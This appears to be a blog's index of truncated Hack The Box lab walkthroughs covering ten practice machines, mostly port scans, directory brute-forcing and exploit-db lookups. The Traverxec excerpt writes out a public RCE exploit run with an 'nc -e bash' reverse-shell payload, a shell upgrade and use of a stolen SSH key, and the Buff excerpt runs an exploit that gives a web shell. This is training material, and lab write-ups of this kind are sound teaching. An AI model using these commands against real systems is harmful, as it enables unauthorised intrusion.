Pages

Search

HTB Traceback

$nmap -A -T4 -p- 10.10.10.181 Open ports: 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 80/tcp open http Apache httpd 2.4.29 Access to http://10.10.10.181 Can we assume that there is a Web-shell in this box? Let’s try to find out. $gobuster dir -u http://10.10.10.181 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e With our usual wordlist, there aren’t interesting results. Let’s try a different one taking into account the comment of the main site that talked about web-shells… $gobuster dir

HTB Traverxec

$nmap -T4 -A -p- 10.10.10.165 Open ports: 22/tcp open ssh OpenSSH 7.9p1 Debian 80/tcp open http nostromo 1.9.6 Nostromo v1.9.6 web server (http://www.nazgul.ch/dev_nostromo.html) $searchsploit nostromo Our web server is vulnerable to an RCE… 🙂 $searchsploit -m 47837 $python 47837.py 10.10.10.165 80 «nc -e bash 10.10.14.15 1234″$nc -lnvp 1234 whoami python3 -c «import pty;pty.spawn(‘/bin/bash’)» We are www-data, let’s enumerate a little bit. www-data@traverxec:/var/nostromo/conf$ ls -la www-data@traverxec:/var/nostromo/conf$ cat .htpasswd $chmod 600 david.key$ssh -i david.key david@10.10.10.165

HTB Bastion

$nmap -A -p- -T4 10.10.10.134 Open ports: 22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp

HTB Forest

$ forest nmap -T4 -A -p- 10.10.10.161 Open ports: We have an Active Directory LDAP server Domain Controller: htb.local OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3) Domain name: htb.local Forest name: htb.local FQDN: FOREST.htb.local To start with the box enumeration we can use JXplorer. JXplorer is a cross platform LDAP browser and editor. It is a standards compliant general purpose LDAP client that can be used

HTB Buff

$ nmap -A -T4 -p- 10.10.10.198 -Pn $ gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt dir -u http://10.10.10.198:8080 -e Access to http://10.10.10.198:8080/ From this home site page: Access to https://projectworlds.in There is a list of different projects. Here you will find this one: https://projectworlds.in/free-projects/php-projects/gym-management-system-project-in-php/ From this site, you can download the whole project. $ searchsploit Gym Management System 1.0 Using this exploit (https://www.exploit-db.com/exploits/48506): $ python2.7 48506.py http://10.10.10.198:8080/ C:\xampp\htdocs\gym\upload> whoami C:\xampp\htdocs\gym\upload> dir A web shell

HTB Curling

$ nmap -T4 -A -p- 10.10.10.150 $ gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt dir -u http://10.10.10.150 -e If we access to http://10.10.10.150/administrator/, we’ll find a Joomla login form. Accessing to http://10.10.10.150, Based on the published post there are these users: Super User Floris Watching on the source code, there is a suspicious secret.txt file somewhere. http://10.10.10.150/secret.txt This string seems to be encoded. Searching for: «linux decode string», Google give us the suggestion of

HTB Postman

$ nmap -A -p- -T4 10.10.10.160 Open ports: 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) 6379/tcp open redis Redis key-value store 4.0.9 10000/tcp open http MiniServ 1.910 (Webmin httpd) $ gobuster dir -u http://10.10.10.160 -w Access to http://10.10.10.160 Access to http://10.10.10.160:10000 Access to https://10.10.10.160:1000 Redis is an open source (BSD licensed), in-memory data structure store, used as a database, cache and

HTB Writeup

$ nmap -A -T4 -p- -sV 10.10.10.138 Although nmap says port 80 is open, it also appears to be as tcpwrapped.What does it mean? Tcpwrapped refers to tcpwrapper, a host-based network access control program on Unix and Linux. When Nmap labels something tcpwrapped, it means that the behavior of the port is consistent with one that is protected by tcpwrapper. Specifically, it means that a full TCP handshake was completed,

HTB Irked

$ nmap -A -T4 -p- 10.10.10.117 Access to http://10.10.10.117 According to Nmap’s results, we have open these ports related to UrealIRCd: 6697/tcp open irc UnrealIRCd 8067/tcp open irc UnrealIRCd 65534/tcp open irc UnrealIRCd (Admin email djmardov@irked.htb) As we have an IRC in this box let’s start trying to connect to it. $ sudo irssi 10.10.10.117 65534 According to this, we have a UnrealIRC version 3.2.8.1 $ searchsploit unrealirc Exploiting UnrealIRC

HTB OpenAdmin

Enumeration $ nmap -A -T4 -p- 10.10.10.171 $ gobuster dir -u 10.10.10.171 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e Access to http://10.10.10.171 Access to http://10.10.10.171/music There is a login link. Click and you’ll be redirected to http://10.10.10.171/ona Based on this screenshot, we have an OpenNetAdmin (v18.1.1) Access to http://10.10.10.171/sierra Access to http://10.10.10.171/artwork Vulnerability analysis $ searchsploit opennetadmin $ searchsploit -x 47691 The -d option in Curl means data. -d, –data: (HTTP MQTT) Sends the specified data in a POST